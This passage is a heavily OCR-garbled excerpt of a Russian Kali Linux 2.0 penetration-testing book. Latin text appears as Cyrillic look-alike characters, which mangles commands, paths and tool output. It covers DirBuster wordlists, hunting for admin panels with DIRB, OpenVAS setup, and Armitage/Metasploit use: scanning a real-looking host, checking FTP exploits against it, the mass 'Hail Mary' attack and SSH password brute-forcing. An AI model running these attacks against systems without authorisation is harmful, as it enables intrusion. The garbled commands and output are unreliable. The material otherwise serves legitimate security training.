/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/ѵѵеЫоеіс.ІхІ: 

361 


ѵѵеЬзрНеге.ІхІ: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬ/ѵиІпз/ѵѵеЬзрЬеге.ІхІ: 

560 


арасііе-изег-епит- 
1.0.1x1 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬизІег/арасІіе-изег-епит- 

І.О.ІхІ 

8930 

Перечислени 

е 

пользовател 

ей Арасііе 

1.0 

арасІіе-и5ег-епит- 

2.0.ІХІ 

/изг/зРіаге/ѵѵогсІІізТз/сІігЬизІіег/арасНе-изег-епит- 

г.о.тхт 

10355 

Перечислени 

е 

пользовател 

ей Арасііе 

2.0 

сіі гесТогіеБ^ЬгоТигг 

/и5г/5ріаге/ѵѵогсІІІ5І;5/сІігЬи5І;ег/сІі гесТогіеБ-іЬгоТигг 

58688 


сіігесіогу-іізі-і.о.іхі: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬизІег/сІігесІогу-ІізІ-1.0.1x1 

141708 

Список 

директорий 

с!ігес1;огу-ІІ5І;-2.3- 

тесііит.іхі: 

/изг/зЬаге/ѵѵогсІІізІз/сІігЬизІег/сІігесІогу-ІізІ-г.З- 

тесііит.іхі 

220560 

Список 

директорий 

среднего 

размера 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Название файла 

Полный путь до файла 

Количеств 

о записей 
в файле 

Описание 

содержимог 

о 

сІігес1:огу-ІІ$1:-2.3- 
зтаІІ .ТхТ 

/изг/БІіаге/ѵѵогсіІізІБ/сІігЬизІег/сІігесІогу-ІізІ-г.З- 

зтаІІ.М 

87664 

Список 

директорий 

малого 

размера 

сіігесіогу-іізі:- 

Іоѵѵегсазе-2.3- 

тесПит.М 

/изг/зІіаге/ѵѵогсІІізІз/сІігЬизІег/сІігесІогу-ІізІ:- 

Іоѵѵегсазе-г.З-тесІіит.ІхІ: 

207643 

Список 

директорий 

среднего 

размера, 

имена 

приведены к 

нижнему 

регистру 

сіігесІогу-ІІБІ:- 

Іо\л/егса$е-2.3- 

зтаІІ .ТхТ 

/изг/зГіаге/ѵѵогсЛ ІБТз/сІігЬизТег/сІігесТогу-ІіБІ:- 
Іо\л/егса5е-2.3-5таІІ.Ъ<1: 

81643 

Список 

директорий 

малого 

размера, 

имена 

приведены к 

нижнему 

регистру 


Глава 44. Поиск админок сайтов с Каіі Ыпих 


Поиск административной панели довольно важен при проведении аудита сайта. 

Админку можно: 

• брутфорсить 

• проверять на 5Щ-инъекции (начинающие программисты часто думают, что в 
отличии от публичных страниц, страницы административной панели никто не 
видит) 

• вводить полученные данные для аутентификации (у меня был совершенно 
реальный случай — я узнал логин и пароль админа через 5Щ.-инъекцию, но так 
и не сумел найти куда их ввести) 


Готовых решений для поиска административных панелей под Ыпих я не нашёл. В 
принципе, понятно, что те, кому это нужно, пишут свои простейшие скрипты, либо 
используют программы вроде 01КВ с пользовательскими словарями. 


Именно этим путём и пошёл я. Как пользоваться программой 01КВ рассказано в статье 
« РІКВ: поиск скрытых каталогов и файлов на веб-сайтах ». Использование очень простое 
— нужно только задать адрес сайта и имя файла словаря: 


1 


сіігЬ <базовый_адрес> [<список(и)_файлов>] [опции] 


Но нам нужен этот самый файл словаря. Я составил свой, и пишу эту заметку чтобы 
поделиться им с вами. Файл составлялся из анализа работы неких программ под 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


\Л/іпсІо\л/5 с названиями АбтіпРа§е и 0\Л/ Асітіп апсі І_о§іп Ріпсіег ѵі.1 (просто запустил их 
в отношении сайта на локалхосте и скопировал из лога те страницы, которые они 
запрашивали). Получившиеся данные я немного дополнил из нескольких словарей 
самой ОІКВ. Из полученных данных были отобраны уникальные строки, и самые 
популярные (вероятные) адреса админок были вынесены в первую десятку. 

Получился файл на 1925 строк. Скачать файл можно по этой ссылке . 


Для использования файл нужно распаковать. Запускать примерно так: 


1 


сПгЬ Ы1р://ехатр1е.сот асІтіп_ѵѵеЬѵѵаге2.1:х1: 


Часть 6. Анализ уязвимостей в операционных системах и 
серверном программном обеспечении 

Глава 45. Сканирование уязвимостей с ОрепѴАЗ 8.0 

Сканирование уязвимостей является важной фазой теста на проникновение. Вовремя 
обновлённый сканер уязвимостей в вашем наборе безопасности часто может сыграть 
важную роль и помочь обнаружить пропущенные ранее уязвимые элементы. По этой 
причине разработчики Каіі Ыпих вручную запаковали последний и самый новый выпуск 
ОрепѴАЗ 8.0 — саму утилиту и её библиотеки для Каіі Ыпих. Хотя особо больших 
изменений в вопросах сканирования уязвимостей в этом релизе нет, мы бы хотели 
дать краткий обзор, как получить ОрепѴАЗ 8.0 и запустить её. 

Настройка Каіі для сканирования уязвимостей 

Если вы ещё этого не сделали, убедитесь, что Каіі обновлена до самой последней 
версии и установите ОрепѴАЗ. Когда готово, выполните команду орепѵаз-зеіир для 
настройки ОрепѴАЗ, загрузки последних правил, создания пользователя абтіп и 
запуска различных сервисов. В зависимости от вашего соединения и мощности 
компьютера, это может занять довольно долгое время. 


1| 

гоо1:@каІІ:~# ар1-§е1: ирсіаіе 

21 

гоо1:@каІІ:~# арТ-§е1: сНзІ-ир^гасІе 

3| 


4| 

гоо1:@каІІ:~# арТ-§е1: іпзіаіі орепѵаз 

51 

гоо1:@каІІ:~# орепѵа$-5е1:ир 

6| 

/ѵаг/ІіЬ/орепѵаз/ргіѵаІіе/СА сгеаіесі 

71 

/ѵаг/МЬ/орепѵаз/СА сгеаіесі 

81 


91 

[і] ТІііз зсгірТ зупсіігопііез ап ІМѴТ соііесбоп ѵѵібт іИе 'ОрепѴАЗ І\ІѴТ РеесГ. 

10| 

[і] Опііпе іп^огтабоп аЬоЩ ІІііз ТеесІ: Ъир://\л/ѵѵ\л/.орепѵа5.ог§/орепѵа5-пѵ1:-1 : еесІ 

111 


121 

5еп1 1143 Ьуіез гесеіѵесі 681741238 Ьуіез 1736923.26 Ьуіез/зес 

131 

Іоіаі зііе із 681654050 зреесіир І5 1.00 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


14 1 

[і] Іпі 1 іаІІ 2 Іп§ зсар сіаІаЬазе 

15 1 

[і] ІЭрсІаТіп§ СРЕз 

16 1 

[і] 11рсіа1іп§/ѵаг/ІіЬ/орепѵаз/зсар-сІаІа/пѵсісѵе-2.0-2002.хті 

17 1 

[і] ІЭрсІаТіп§ /ѵаг/ІіЬ/орепѵа5/зсар-сІа1а/пѵсІсѵе-2.0-2003.хті 

18 1 


19 1 

ѴѴгіТе ой! сіаІаЬазе ѵѵііН 1 пеѵѵ епігіез 

20 1 

йаіа Вазе 1) рсІаТесІ 

21 1 

Кез1аг1іп§ СгеепЬопе Бесигііу АззізТапТ: §5асІ. 

22 1 

ІІзег сгеаіесі ѵѵіііі раззѵѵогсі ’6062сЮ74-0а4с-4с]е1-а26а-519ГО55Ь7с88'. 


Этот процесс долгий, очень долгий. В какой-то момент мне показалось, что программа 
просто зависла. И только из-за системного монитора, который показывал активное 
потребление ресурсов процессора и работу жёсткого диска, я дождался окончания 
процедуры. Об окончании работы программы будет свидетельствовать возвращённый 
нам ввод в командную строку. Когда орепѵаз-зеіир завершит свою работу, ОрепѴАЗ 
тапа§ег, сканер и службы 05А0 должны прослушивать порты: 


1| 

гоо1:(а5каМ:~# пеТзТаТ -апір 

2 1 

Асііѵе 1 пТегпеТ соппесііопз (зегѵегз апсі езІаЫізІіесІ) 

3| 

Ргоіо Кесѵ-ЦБепсІ-О. І_осаІ Асісігезз Рогеі§п Асісігезз БТаТе РЮ/Рго§гат пате 

4| 

1ср 0 0 127.0.0.1:9390 0.0.0.0:* * ЫБТЕІЧ 9390/орепѵазтсІ 

5 1 

1ср 0 0 127.0.0.1:9391 0.0.0.0:* ЫБТЕІЧ 9391/орепѵаз5СІ: ѴѴаі 

6| 

1ср 0 0 127.0.0.1:9392 0.0.0.0:* ЫБТЕІЧ 9392/§засІ 


С 


АІех@МіАІ-РС ~ 

$ ббН гооР@192.168.1.33 

І_і пих каіі-тіа! 3.18. 0-ка1і 3-МКІ64 #1 5МР ЭеЬіап 3.18. 6-1~ка1і2 (2015-03-02) х86_64 


' 7ММР' А ' 7МР' *ММ ’ 7ММР* А * 7МР’ 

'МА ,МА ,Ѵ ММ 'МА ,МА ,Ѵ 

ѴМ: , ѴѴМ: ,Ѵ .дР"Ѵа ММ,сіММЬ. ѴМ: ,ѴѴМ: ,Ѵ ,6"ѴЬ. '7МЬ,осІ8 .дР'*Уа 

ММ. М' ММ. М',М’ ѴЬ ММ ’МЬ ММ. М’ ММ. М'8) ММ ММ’ ”*,М’ УЬ 

'ММ А’ 'ММ А’ 8М. ММ М8 'ММ А’ 'ММ А’ ,рт9ММ ММ 8М. 

:ММ; :ММ; УМ. , ММ. ,М9 :ММ; :ММ; 8М ММ ММ УМ. , 
ѴР ѴР ’МЬттсГ РлуЫтіР’ ѴР ѴР МооЭАУо.. ЗММІ_. ’МЬттсГ 


ТЬе ргодгатБ іпсіигіесі ѵѵііН іИе Каіі СМЬ/1лпих БуБІет аге ‘Ргее БоГЪѵаге; 
*Не ехасР сіібігіЬігРіоп *егт5 -Рог еасИ ргодгалі аге гіеБсгіЬесі іп іНе 
іпсііѵігіиаі -РіІеБ іп /и5г/5Наге/сіос/*/соругідЬѣ. 

Каіі СМІ/ІЛПИХ сотеБ ѵ%і1;Н АВ50ШТЕІ.У N0 КАККАМТУ, Ро іНе ех±епИ 
регтіііесі Ьу аррІісаЫе Іаѵѵ. 

Е.В5І Іодіп: Ргі Мау 1 14:33:32 2015 -рГОЯ 192.168.1.35 

гоо1:@ка1і-тіаі :~# пе1:5І:а1: -апрр 

АсРіѵе Іпіегпеі: соппесРіопБ (БегѵегБ апсі еБ^аЫІБИес!) 

РгоРо Кесѵ-0 5епс1-р І_оса1 АсісІгеББ Рогеідп АсІгігеББ 

*ср 0 О 127.0.0.1:50505 0.0.0.0:* 

Рср О О 127.0.0.1:9390 0.0.0.0:* 

Іср 0 0 0.0.0.0:3790 0.0.0.0:* 

*ср О 0 127.0.0.1:9391 0.0.0.О:* 

*ср О О 127.0.0.1:9392 0.0.0.0:* 

ѣср О 0 0.0.0.0:22 0.0.0.0:* 

Рср О О 127.0.0.1:5432 0.0.0.0:* 

Рср 0 216 192.168.1.33:22 192.168.1.35:58802 

Рср О О 192.168.1.33:22 192.168.1.35:56351 

Рсрб О 0 :::22 :::* 

Рсрб О О ::1:5432 :::* 

Рсрб О 0 ::1:5432 ::1:56105 

Рсрб 0 0 ::1:56105 ::1:5432 

Рсрб 0 0 ::1:56106 ::1:5432 

Ісрб 0 0 ::1:5432 ::1:56107 

Рсрб 0 0 ::1:5432 ::1:56106 

*ср6 0 0 ::1:56107 ::1:5432 

гоои(?ка1 - -іп аі | 


51аРе РЮ/Ргодгат пате 

И5ТЕМ 3011/ргобѵс 

І.І5ТЕК 5 219/орепѵаБтсі 

І.І5ТЕМ 3394/пдіпх. соп'Р 

І.І5ТЕМ 5206/орепѵаББСІ: Ѵ/аі 

І.І5ТЕМ 5232/дБасі 

І-І5ТЕМ 3179/ббМ 

І.І5ШІ 2740/роБІдгеБ 

Е5ТАВІ.І5НЕ0 5259/1 
Е5ТАВІ.І5НЕ0 3690/0 
І.І5ТЕМ 3179/ббНсі 

И5ТЕЫ 2740/роБІдгеБ 

Е5ТАВИ5НЕ0 3385/роБІ:дге5: гпБ-рЗ 
Е5ТАВИ5НЕ0 3011/ргобѵс 
Е5ТАВІ.І5НЕ0 3011/ргобѵс 
Е5ТАВИ5НЕ0 3423/ро5*дге5 : тБ-РЗ 
Е5ТАВІ.І5НЕ0 3421/ро5І:дге5: гпбГЗ 
Е5ТАВІ.І5НЕ0 3011/ргобѵс 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Подключение к веб-интерфейсу ОрепѴАБ 


Наберите в вашем браузере Ы:1:р5://127.0.0.1:9392, нужно будет принять 
самоподписанный 551. сертификат и ввести данные пользователя абтіп. Админский 
пароль был сгенерирован во время фазы настройки. Если вы пропустили этот пароль (я 
устанавливал эту программу дважды — в первый раз я пароль совсем не нашёл, а во 
второй раз он оказался в самом конце вывода), то вы можете задать новый пароль. 
Чтобы получить список пользователей наберите: 


1 


орепѵазтсі --§е1:-и5ег5 


А чтобы поменять пароль: 


1 


орепѵазтсі ~и5ег=асІтіп --пе\л/-раз5ѵѵогсІ=1 


Там, где у меня абтіп, скорее всего, не нужно ничего менять, у вас должен быть такой 
же пользователь. А там, где у меня стоит единичка, задайте свой пароль. 

Или просто создайте нового пользователя: 


1 


орепѵазтсі -сгеа1:е-и5ег=тіаІ 


Для него автоматически будет сгенерирован длинный пароль. 


т 

бгеепЬопе 

Щ І_оддесі іп азАсітіп асітіп | 1_одоиі 


Зесшііу А$5І5кзп* 

Ргі Мау 1 12:34:35 2015 ЫТС 


Зсап МападетегтЬ 

Аахеі Мападетепі 

ЗесІгтЕо Мападетепі 

Сопіідигаііоп 

Ехігае Асітіпіаігаііоп 

Неір 


Тазкз (ТоТаІ: 0) 


■ зші 


ѵ'№ аіЛо-ге^гезЬ 


РІІІег: 


а РРІУ_ оѵегг ісІе5 : =1 гоѵѵ5=10 ЙГ5І=1 5ог*=пате 


КерогТз 


ТоіаІ 


(АррІіесИіІЕег: аррІу_оѵеггі4е5=1 гоѵѵ5=10 Яг5І=1 5оіі=пате) 

ѴѴеІсоте сіеаг пеѵѵ изег! 

То ехріоге ТЬіз роѵѵегіиі арріісаііоп апсі Іо 
Ьаѵе а диіск зТагі: ^ог сіоіпд ТИіпдэ іЬе Тігзі: 
ііте, I ат Ьеге Іо аззізі уои ѵѵііЬ зоте 
Ьіпіз апсі зЬогі-сиіз. 


I ѵѵіІІ арреаг аиіотаіісаііу іп агеаз ѵѵЬеге 
уои Ьаѵе сгеаТес! по ог опіу а іеѵѵ оЬіесіз. 
Апсі сіізарреаг ѵѵЬеп уои Ьаѵе тоге іЬап 3 
оЬ|есіз. Ѵои сап саІІ те ѵѵіТЬ ТЬіз ісоп ЙЭ 
апу ііте ІаТег оп. 

Ііуои ѵѵапі Ьеір сгеаііпд пеѵл/ зсап іазкз 
Ьиі аізо тоге орііопз, уои сап зеіесі 
"Асіѵапсесі Таз к ѴѴігагсІ" ігот іЬе ѵѵігагсі 
зеіесііоп тепи аТ іЬе Тор оі ТЬіз ѵѵіпсіоѵѵ 
ѵѵЬеге № сиггепііу зауз "Та 5 к \Л/і 2 агсі" 
тагкесі ѵѵіТЬ а зтаІІ аггоѵѵ. 

Рог тоге сіеТаіІесі іпіогтаііоп оп 
ТипсТіопаІіТу, ріеазе Тгу ТЬе іпТедгаТесі 
Ьеір зузіет. II із аіѵѵауз аѵаіІаЫе аз а 
сопіехі зепзіііѵе Ііпк аз ісоп в 




]□ І--1 г 1 вш 





ьі 1 г 

| 5іагі 5сап 



Оиіск зіагТ: Іттесііаіеіу зсап ап ІР асігігезз 

ІР асісігезз ог Ьозіпате: 


Рог ТЬіз зЬогі-сиі I ѵѵіІІ сіо іЬе ТоІІоѵѵіпд іогуои: 


Сгеаіе а пеѵѵ Тагдеі ѵѵіТЬ сіеТаиІТ Рогі Ызі 

Сгеаіе а пеѵѵ Тазк изіпд ТЬіз іагдеі ѵѵіТЬ сіеТаиІТ 5сап 

Сопіідигаііоп 

ЗТагТ іЬіз зсап Тазк гідЬі аѵѵау 

БѵѵіісЬ іЬе ѵіеѵѵ Іо геіоасі еѵегу 30 зесопсіз зо уои сап Іеап 
Ьаск апсі ѵѵаісЬ іЬе зсап ргодгезз 


Іп іасі, уои тизі поі Іеап Ьаск. Аз зооп аз іЬе зсап ргодгезз із 
Ьеуопсі 1%. уои сап аігеасіуіитр іпіо ТЬе зсап герогТ ѵіа ТЬе Ііпк іп 
ТЬе Верогіз ТоіаІ соіитп апсі геѵіеѵѵіЬе гезиііз соІІесТесі зо іаг. 

\Л/Ьеп сгеаііпд іЬе Тагдеі апсі Тазк I ѵѵіІІ изе іЬе сіеіаиІТ Рогі Ызі, 

АІегТ, ОрепѴАБ Зсап СопТід, СгесіепТіаІз, ОрепѴАБ Бсаппег апсі БІаѵе 
сопіідигесі іп "Му Зеіііпдз". 

Ву сііскіпд іЬе ІЧеѵѵ Тазк ісоп ... уои сап аізо сгеаіе а пеѵѵ Тазк 
уоигзеіі. Ноѵѵеѵег, уои ѵѵіІІ пеесі а Тагдеі Тігзі, ѵѵЬісЬ уои сап сгеаіе Ьу 
доіпд іо іЬе Тагдеіз раде іоипсі іп іЬе Сопіідигаііоп тепи изіпд іЬе 
Ыеѵѵ ісоп іЬеге. 


Васкепсі орегабоп: 0.145 


бгеепЬопе Зесигіку А55І5ЕагЛ (С5А) СоругідЫ 2009-2015 Ьу бгеепЬопе МеЕѵѵогкз бтЬН, ѵѵѵѵѵѵ.дгеепЬопе.пеЕ 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Для запуска программы при последующих перезагрузках компьютера набирайте 
команду: 


1 


орепѵаз-зіагі: 


Всё готово! Теперь ОрепѴАЗ готов для вашей настройки и запуска сканирования ІР 
адреса, диапазона или хоста. Счастливого сканирования уязвимостей! 


Глава 46. Инструкция по Агтііа§е: автоматический поиск и 
проверка эксплойтов в Каіі Ыпих 


Что такое Агтііаее 

Агті1:а§е — это, в некотором смысле, графический интерфейс для МеТазрІоіІ:, ІМтар. 
Агті1:а§е позволяет выбрать в графическом меню какую-либо из наиболее часто 
применяемых задач и сама запустит необходимую программу с нужными ключами для 
её выполнения. 


Но на этом возможности Агті1:а§е не кончаются. Она позволяет делать довольно 
сложные осмысленные вещи: сканирует целевую систему, на основании собранных 
данных (ОС, открытые порты, запущенные службы и т. д.) составляет список 
эксплойтов. После этого мы можем применять эксплойты по одному, запустить 
массовую проверку, запустить отработку всех эксплойтов в отношении целевой 
машины, брутфорсить аутентификацию и т. д. 

Т.е. интересного в Агті1:а§е много, а использовать её нетрудно. Начнём. 

Как увеличить скорость работы Агтііаёе 

Агті1:а§е, особенно на слабых машинах, работает медленно. Для «ускорения» работы 
программы попробуйте: 

• увеличить оперативную память хотя бы до 3 Гб 

• установите оригинальную машину .Іаѵа 8. 

Я себе ставил ]аѵа 8 (ЮК 8и45) по этой инструкции . Всё прекрасно сработало. НО: ни в 
коем случае не удаляйте орегцсік — в Кали вместе с ним удаляется и АгтіІа§е и много 
других вещей. Пусть он останется, хоть и не будет использоваться. 


Запуск Агтііаёе 

Для начала нам нужно запустить службы Розі^геЗЩ и Меіазріоіі: 


В Каіі 2.0 


1 


/еТс/іпіТ.сІ/розТёгезцІ зТагТ && тзГсІЬ іпіГ 


В Каіі 1.x 


1 


зегѵісе ро$1:§ге5ЦІ зТагІ: && зегѵісе теіазріоіі: зТагТ 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


гоо*(д)ѴѴеЬ\Л^аге-КаІі: /орі/іаѵа 

Файл Правка Вид Поиск Терминал Справка 


гооЩ'л'еЬКа ге- Каіі :/орТ/1 аѵа# зегѵісе розідгезяі зіагі && зегѵісе тѳіазріоіі зіагі 
[ оК ] ЗТагТіпд РозТдгеЗОІ. 9.1 сІаТаЬазе зегѵег: таіп. 

[ ок ] ЗТагТіпд МѳТазрІоіІ: грс зегѵег: ргозѵс. 

[ ок ] ЗТагТіпд МѳТазрІоіІ: меЬ зегѵег: ТЫп. 

[ ок ] ЗТагТіпд МеТазрІоіІ: могкег: ѵ/огкег. 

:/орТ/]аѵа# | 


После этого запускаем Агті1:а§е: 


1 


агті1:а§е 


И... ждём. В это время система будет пыхтеть жёсткими дисками и использовать уйму 
памяти — точно также, как и при запуске «чистого» Меіазріоіі;. 



Некоторое время спустя появится вот такое окошечко, в нём просто нажимаем Соппесі. 



В этом окне нажимаем Ѵез. И... ждём ещё дольше. 


Если вы используйте виртуальную машину, то выделите ей, минимум, 2 Гб 
оперативной памяти. Иначе на одном из этих этапов машина может зависнуть. На 
реальном достаточно мощном компьютере, всё прошло довольно быстро. 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


В следующем окне предупреждение о том, что в соединении отказано, игнорируем это 
сообщение и просто ждём: 



В конечном итоге откроется такое окно: 



(Нажмите на изображение, чтобы увеличить) 


Как использовать АгтИа^е 


Нам нужен ІР адрес целевой машины. Если вы проверяете сайт, то для получения его ІР 
можно воспользоваться сканером птар: 


1 


птар ѵѵеЬѵѵаге.Ьіі 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Вместо ѵѵеЬѵѵаге.Ьіг введите адрес интересующего вас сайта. 


гооГ@МіАІ: 

Файл Правка Вид Поиск Терминал Справка 


:~# птар ѵѵеЬѵѵаге.Ьіг 


_ 1 □ 


ЗГагТіпд ІМшар 6.47 ( ЬГГр ://птар.о гд ) аТ 2015- 07-02 11:58 М8К 
ГІтар зсап герогі Гог ѵѵеЬѵѵаге.Ьіг (| 

!Нозі із ир (0.26з Іаіепсу) . 


185.26.122.50 


гР№ гесогсі Гог 185.26.122.50: 
(N 01 зЬоѵѵп: 986 сіозесі рогіз 


зеп/50-26 .ЬозііапсІ . ги 


РОВТ 

ЗТАТЕ 

5ЕКѴІСЕ 

21/іср 

ореп 

Пр 

25/Гср 

орѳп 

зтір 

80/іср 

орѳп 

Гііір 

111/Гср 

орѳп 

грсЬіпсІ 

135/іср 

■ШЛѳгѳсІ 

тзгрс 

139/Тср 

■рііііѳгѳсі 

пеіЬіоз-ззп 

443/іср 

орѳп 

Ьіірз 

445/Гср 

Тіііѳгѳсі 

тіс гозоГГ -сіз 

873/Гср 

орѳп 

гзупс 

1022/Гср 

орѳп 

ехр2 

;1024/Гср 

орѳп 

ксіт 

2049/Гср 

орѳп 

пГз 

3306/Гср 

орѳп 

гпузді 

4443/Тср 

орѳп 

рЬагоз 


ІМтар Ьопе: 1 ІР асісігезз (1 Ьозі ир) зсаппесі іп 10.66 зесопсіз 

[і_:~# | 


Интересная информация по открытым портам и запущенным службам, но прямо 
сейчас нас интересует только ІР адрес — 185.26.122.50. 

В Агті1:а§е в меню выбираем Нозіз -> Абб Нозіз.... Вставляем в открывшееся окошечко 
наш ІР: 



Кликаем правой кнопкой мыши по добавленому хосту и выбираем 5сап. Во время 
сканирования определяется версия ОС, запущенные процесс, открытые порты. 
Благодаря этой информации будут отобраны применимые эксплойты. 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 



Сканирование завершено: 




Сопаоіе X 

[ Зсап X | 



тзі аихіііагу (Ьіір ѵегзіоі ) > зеі РРОКТ 443 
РРОКТ => 443 

тзі аихіііагу (Ьіір ѵегаіоп) > зет 551. 1 
551. => 1 

та! аихіііагу (Ьіір ѵегзіі п) > аеі РН05Т5 185.26.122.50 

КН05Т5 => 185.26.122.50 

тзі аихіііагу (Ьіір ѵегаіоп) > гип -] 

[*] АихіИагу тосіиіе гиппіпд аз Ьаскдгоиікі зоЬ 
[*] $саппе(І 1 о! 1 Ьозіз (Шо сотріеіе) 

[*] 1 зсап Іо до... 

та! аихі1іагу( ѵегзл ) > иае асаппег/туадІ/туадІ_ѵегаіоп 
тзі аихіііагу (піуаді ѵегаіоп) > зеі ТНРЕА05 24 
ТНРЕА05 => 24 

тзі аихіііагу (шуаді ѵегаіоп) > зеі РРОКТ 3306 
РРОКТ => 3306 

тзі аихіііагу( ѵегзі ) > зеі РН05Т5 185.26.122.50 

КН05Т5 => 185.26.122.50 

таі аихіііагу (шуаді ѵегаіоп) > гип -] 

[*] Аихіііагу тоііиіе гиппіпд аа Ьаскдгоиікі іоЬ 

[*] 185.26.122.50:3306 іа гиппіпд Му5<)1_ 5.5.35-33.0-1од (ргоіосоі 10) 
[*] 5саппе(І 1 оі 1 Ьозіз (100% сотріеіе) 

[*] 5сап сотріеіе іп 50.302а 

таі аихіііагу (туаді ѵегаіоп) > |_ 


Если ОС не определилась с первого раза, то перейдите в меню Нозіз ->І\Ітар 5сап -> 
Оиіск 5сап (05 сіеіесі). 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 



(Нажмите на изображение, чтобы увеличить) 


Теперь кликайте правой кнопкой мыши по хосту и выбирайте АМаск. В открывшемся 
меню атаки сгруппированы по типу цели. Можно уже сейчас выбрать конкретную атаку 
или провести проверку группы атак.. Делается это выбором опции сбеск ехріоііз. 


Алл Наде уів* Нот ДНаскі йогкірасеі Цяір 


' ЙаихіПагу 
ІЙ прІоП 
ІЙ рауІоаО 



| Сопчоіе X Т 5сап X \ 


. біагіілд Пир 6.47 ( ІіГСрі//тыр.огд ) а» 2015-07-02 12іѲ7 ичк 
П ир ‘.«ап герогГ Іог №. 26 . 122.60 
■ ІІОЧІ 1ч ир (0.26ч Іаіепсу). 
і N 01 чкоип: 80 сіочегі рвгіч 
РОКТ 5ТДТЕ 5ЕНѴІСЕ ѴЕН5І0М 

: 71 Дер орсп Ир РгоРТРИ 1. Э.бгсЗ 

і 25Дср ореп чшір РочШі чшірй 

і 80Дср ореп ЬПр пдіпі 1.6.3 

і 111/ир ореп грсЫпЙ 2-4 (НРС #180000) 

: 136/ир тіегеа якгрс 

: 130/Іср Шіегеі) пеСЫоч-ччп 

: 443/1ср ореп НІІр пдіпі 1.6.3 

446/(ср НИегей шсгочоН-йч 

: 873/1ср ореп гвупс (ргоіосоі ѵегчіоп 30) 

7944/Кр ореп пСч 2-4 (НРС #100003) 

1 ЗЗвбДср ореп «учді Н»6(Ц 6.6.36-33.Ѳ-Іод 

: Оеѵісе Іуреі депегаі ригроче 
Нпппіпд (ЛІ5Т ШЕ66ІМС): Ііпиі 2.6.Х|З.Х (086) 
і 06 СРЕі с ре і /о: Ііпиі і Ііпиі _ІсіпсІ:2.6 сре і/о і Ііпиі: ипиі_кегпеІі 3 

: Аддгеччіѵе 06 диеччечі 2.6.32 (9Г.). ііпиі 2.6.32 - 2.6.30 (ОА). Ііпиі 3.2 - 3.8 (Об*.), Ііпиі 2.6.3 
ь.зв (ог.) 

Но еі«(Т Об пмТскеч Гог Ііочі (Іечі сопйіііопч поп-ійеаі). 
бегѵісе ІпГо! ііочі: чегѵ50,ІіочПапй,гиі Обі Цпіі 

; 05 апй бегѵісе Йеіесііоп регіоітей. Ріеоче герогі ап у іпсоггесі гечиііч оі Н11рі//пвар.огд/чиіаі1/ . 
Пир Йопе: 1 ІР аййгечч (1 Ііочі ир) чсаппей іп 17.10 чесопйч 


■ 2.6.32 (036). Ііпиі 2.6.30 (03'.). Ііпиі 3.4 (036). Ііпиі 2.6.32 - 2.6.35 (026). Ііпиі 3.1 


(Нажмите на изображение, чтобы увеличить) 


Фраза «Тбе Тагмет із поТ ехрІоііаЫе.» означает, что цель не подвержена этому 
эксплойту. Фраза «Тбіз тобиіе сіоез по* зиррогі; сбеск.» означает, что модуль не 
поддерживает проверку. Т.е. это не значит, что он не применим. В этом случае модуль 
нужно сразу запускать для атаки: 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


[ Сопаоіе X ] 5сап X | птар X | СЬеск ЕхрІоИз )Г| 


те! ехрІоіК і оТ1:р (і іи ) > иве тиІіі/іір/ригеіір<І_ЬавІі_епѵ_ехес 

тві ехрІоіКригеііргіЬавІіепѵехес) > веі КН05Т 185.26.122.50 
КН05Т => 185.26.122.50 

тві ехрІоіК игеііріі Ьгіьіі епѵ ех ) > сНеск 

[*] 185.26.122.50:21 - ТНе іагдеі ів поі ехрІоііаЬІе. 


===== СИескіпд и пі х /1 ір /ѵ в 1 ір (І_234_Ь а с к (I о о г ===== 

щві ехрІоіІ(ригеіір<І _Ьа I: епѵ ехеі ) > иве ипіх/іір/ѵвіір()_234_Ьаск(1оог 

щві ехрІоіК <>і4р<1 234 ЬасІ г) > ее! КН05Т 185.26.122.50 

РН05Т => 185.26.122.50 

тві ехрІоіК віір<1 234 Ьасксіі г) > сііеск 

[*] 185.26.122.50:21 - ТПів тойиіе (іоев поі виррогі сНеск. 


===== СНескіпд тиІіі/іір/миіір<1_8Ііе_ехес іогтаі ===== 

тві ехрІоіК ) > иве тиІіі/іір/миіір(1_8Ііе_ехес_іогтаі 

тві ехр1оіі(миіір(І_8Ііе_ с_іогтаі) > веі КН05Т 185.26.122.50 
КН05Т => 185.26.122.50 

тві ехрІоіК ііірсі ві1е_ехес_1оггаа1) > сНеск 

[*] 185.26.122.50:21 - ТНе Іагдеі ів поі ехрІоііаЬІе. 

тві ехрІоіКмиііргі вііе ехес іогтаі) >_ 


Ещё в меню АМаскз -> есть опция НаіІ Магу. При выборе этой опции в отношении 
целевой машины будут сделаны попытки использовать сотни эксплойтов. Это означает, 
что вы сильно засветитесь в логах. Это на тот случай, когда вы уже не знаете, что ещё 
попробовать. 

Брутфорс паролей в Агтііаее — Меіазріоіі 

Напоследок рассмотрим ещё одну функцию Агті1:а§е — Меіазріоіі:. Думаю, вы уже 
обратили внимание на возможность входа в ззб, Др, Му50.І_ и другие службы, если бы у 
вас был пароль. Если пароля нет, то можно занятся его подбором. Для выбора плагина, 
наберите Іо§іп. Теперь можно просмотреть доступные. Например, я хочу подобрать 
пароль для 55Н. Тогда я выбираю аихіІіагу/5саппег/$$И/$$И_Іо§іп в панеле модулей и 
дважды кликаю на неё: 


Агтііаде Ѵіеѵѵ Нозіз АИаскз Могкзрасез Неір 


_ рорЗ_Іодіп 
ѵ йм розГдгез 

_роз*дгез_Іодіп 

Т Ё гзегѵісез 

_ гекес_Іодіп 
И гІодіп_Іодіп 
П гзЫодіп 

▼ Ё зар 

[3 зар_тдт1:_соп_Ьги1:е_Іо( 
О] зар_зоар_гіс_ЬгиІе_Іодіг 
_зар_ѵѵеЬ_диі_Ьги1:е_Іодіп 

▼ Ё 5сасІа 

[_] коуо_Іодіп 

▼ Ё 5т Ь 

[3 зтЬ_Іодіп 

